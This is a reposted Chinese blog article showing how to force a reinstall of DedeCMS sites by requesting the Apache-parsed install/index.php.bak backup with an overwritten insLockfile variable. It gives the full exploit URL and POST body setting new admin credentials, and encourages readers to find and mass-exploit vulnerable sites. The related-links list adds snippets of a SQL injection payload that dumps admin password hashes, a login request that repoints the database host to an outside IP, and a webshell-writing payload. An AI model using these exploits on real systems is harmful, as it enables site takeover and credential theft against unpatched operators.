Dedecms通杀重装漏洞 利用apache解析+变量覆盖

最新推荐文章于 2022-11-06 14:15:13 发布
最新推荐文章于 2022-11-06 14:15:13 发布
阅读量1k 收藏
点赞数
分类专栏: dede安全防毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forest_fire/article/details/50944224
版权

Dedecms通杀重装漏洞 利用apache解析+变量覆盖

作者:honker90   发布:2013-06-06 16:20   分类: 漏洞公布   被撸:4,047次    6条评论  

利用条件是webserver要求是存在apache解析漏洞和install文件夹存在。
利用截图:

20130606070705_46554

Dedecms在安装后会把安装文件/install/index.php备份成/install/index.php.bak,这个在apache下面是会解析成PHP执行的。
看看/install/index.php.bak代码:

1$verMsg ' V5.7 GBKSP1';
2$s_lang 'gb2312';
3$dfDbname 'dedecmsv57gbksp1';
4$errmsg '';
5$install_demo_name 'dedev57demo.txt';
6$insLockfile = dirname(__FILE__).'/install_lock.txt';
7$moduleCacheFile = dirname(__FILE__).'/modules.tmp.inc';
8 
9define('DEDEINC',dirname(__FILE__).'/../include');
10define('DEDEDATA',dirname(__FILE__).'/../data');
11define('DEDEROOT',preg_replace("#[\\\\\/]install#"'', dirname(__FILE__)));
12header("Content-Type: text/html; charset={$s_lang}");
13 
14require_once(DEDEROOT.'/install/install.inc.php');
15require_once(DEDEINC.'/zip.class.php');
16 
17foreach(Array('_GET','_POST','_COOKIE'as $_request)
18{
19    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
20}
21 
22require_once(DEDEINC.'/common.func.php');
23 
24if(file_exists($insLockfile))
25{
26    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
27}
28 
29if(empty($step))
30{
31    $step = 1;
32}

其中$insLockfile = dirname(__FILE__).’/install_lock.txt’;是安装锁文件。在下面的

1if(file_exists($insLockfile))
2{
3    exit(" 程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!");
4}

这个代码的意思是:如果$insLockfile这个文件存在,那么就提示已经安装了,如果$insLockfile不存在,那么就可以继续安装,那么我们要控制$insLockfile才能重新安装,
关键的问题在这两段代码中间还有一段dedecms一直很二逼的变量覆盖的代码。

1foreach(Array('_GET','_POST','_COOKIE'as $_request)
2{
3    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
4}

这个是注册变量,如果存在变量就直接覆盖了。
所以我们直接在请求里加上insLockfile=seay就可以把$insLockfile变为seay,当然文件不存在的啦。就重装了。
利用演示:
直接POST数据到这个URL

http://www.localhost.com/install/index.php.bak?insLockfile=1&step=4

就OK了

20130606070937_40308

POST数据:

1step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&adminuser=admin&adminpwd=admin&cookieencode=JzIVw7439H&webname=%CE%D2%B5%C4%CD%F8%D5%BE&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Flocalhost&cmspath=%2Fdedecms

其中的dbhost啥的东西自己改改吧,
提交数据包。效果如下

20130606071032_57112

重装了。。。。我是良民
批量EXP就不写了,要玩的自己搞吧,exp google搜索批量,估计dedecms的站要废一大半。
原文:http://www.cnseay.com/2956/

北方的刀郎
关注
专栏目录
[分析]-DedeCMS全版本通杀SQL注入漏洞
Nixawk
05-04 5717
mysql> SELECT s.*,t.* FROM -> `dede_member_stow` AS s LEFT JOIN -> `dede_member_stowtype` AS t ON s.type=t.stowname -> WHERE s.aid='1' -> AND s.type='\\' or mid=@`\\'` /*!50000unio
mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
weixin_42118161的博客
02-18 887
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GL...
dedecms 躺着也中枪 爆重装漏洞
ITfinder
06-30 243
利用条件:web server: apache漏洞原因::apache 不认识bak 直接当php执行. http://webshell.cc/install/index.php.bak?insLockfile=1 这dedecms死的太冤枉了. apache的原因. 原文地址:http://www.webshell.cc/4379.html   不过这个问题并不会影响太大,因为当进行...
dedecms重装漏洞
最新发布
weixin_43778463的博客
11-06 857
dedecms重装漏洞漏洞版本v5.7
dedecmsapache下的.bakphp运行的重装漏洞(含临时解决方案)
IT技术宅-北方的刀郎
03-21 1602
dedecmsapache下的重装漏洞(含临时解决方案)2013-06-06      0 个评论       作者:Sys Shell收藏    我要投稿利用条件:web server: apache漏洞原因:apache 不认识bak 直接当php执行.www.url.com/install/index.php.bak?insLockfile=1 注:Editorplus 软件编辑文件会自动
DedeCMS全版本通杀SQL注入漏洞利用代码
weixin_34007291的博客
03-21 500
EXP: Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'   or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select   CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`  limit+0,1...
对某 DedeCMS 二开系统全局变量追加漏洞利用1
08-04
【对某 DedeCMS 二开系统全局变量追加漏洞利用1】 这篇文章主要讲述了作者针对一个基于DedeCMS二次开发的系统进行安全测试的过程。DedeCMS是一个流行的PHP内容管理系统,由于其开源特性,常常被用于搭建网站。然而...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
DedeCMS 存储型xss漏洞1
08-03
利用漏洞,攻击者需要能够访问并操作DedeCMS后台的“系统”->“支付工具”->“配送方式设置”,在那里他们可以添加一个新的配送方式,将XSS payload 输入到“简要说明”字段中。一旦数据保存到数据库,payload ...
e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
weixin_39705018的博客
12-21 95
话说文章写得菜不要紧,首先标题要跟大牛一样!作者:单恋一支花出自:t00ls转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿!一:写在前面今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现dedecms通杀漏洞,小菜我异常激动,奈何发表漏洞的大牛只给出exp没给出漏洞分析,看到论坛的部分童鞋还在苦思漏洞缘由,小菜我虽然菜,但是懂点php,所以前来献丑,广大童鞋勿喷!二:php也有抽的时候当尝试p...
DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
热门推荐
CC's Blog
03-05 1万+
DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析 漏洞执行过程 1.首先执行到plus/recommand.php,包含了include/common.inc.php require_once(dirname(__FILE__)."/../include/common.inc.php"); 2来看到include/common.inc.php function _R
/plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
weixin_42500380的博客
03-18 590
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具目前官方最新版已修复该漏洞V5.7.37 GBK正式版20140228常规更新补丁http://www.dedecms.com/pl/http://www.wooyun.org/bugs/wooyun-2014-051889http://www.wooyun.org/bugs/wooyun-2014-051950请删除 plus/recomme...
dedecms注入漏洞 search.php,[通杀]dedecms plus/search.php 注入漏洞利用方式
weixin_35909607的博客
03-11 477
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。既然已经发出来了,我就把我自己搞的exp发下吧。。唉。我一般是这样测试的:提交 xx.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a转载不加作者名的没JJ作者:鬼哥看结果如...
mysql全版本通杀提权_DedeCMS全版本通杀SQL注入漏洞利用代码
weixin_29794879的博客
01-19 231
packageorg.javaweb.dede.ui;importjava.awt.Toolkit;importjava.io.BufferedReader;importjava.io.InputStreamReader;importjava.net.URL;importjava.util.regex.Matcher;importjava.util.regex.Pattern;/****@aut...
PHP代码审计3—系统重装漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
06-26 1088
PHP代码审计之系统重装漏洞入门
php变量覆盖漏洞,DEDECMS全局变量覆盖漏洞科普
weixin_31236309的博客
03-11 247
DEDECMS全局变量覆盖漏洞最早是狼族安全小组09年公布的,官方硬撑到现在没修补漏洞,到现在基本上覆盖DEDECMS全部的版本。个人猜想是不是官方故意留下的后门。下面稍微科普下这个漏洞,大牛们可以完全无视:一. 了解PHP超级全局变量下面是PHP的超级全局变量,可以了解一个特性,全是数组。$GLOBALS, 所有全局变量数组$_SERVER, 服务器环境变量数组$_GET,通过GET方法传递给...
DEDE全局变量再次覆盖研究
kendyhj9999的专栏
05-22 955
DEDE全局变量再次覆盖研究 http://0day5.com/archives/257 时间:12-12-13 栏目:PHP 作者:0day5 评论:2 点击: 3,776 次 本文标签: dede from:http://lanu.sinaapp.com 这个是大牛研究的博文:http://www.0x50sec.org/dedecms%e
DedeCms v5.6 嵌入恶意代码执行漏洞
Yatere的天平秤
04-25 1232
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz
挖掘DedeCMS二开系统全局变量漏洞:从源码审计到后台利用
"对某DedeCMS二开系统全局变量追加漏洞利用1" 这篇文档主要讨论的是针对一个基于DedeCMS二次开发的系统的安全漏洞利用DedeCMS是一款流行的开源内容管理系统,但在其基础上进行定制的系统可能会引入新的安全风险。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北方的刀郎

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值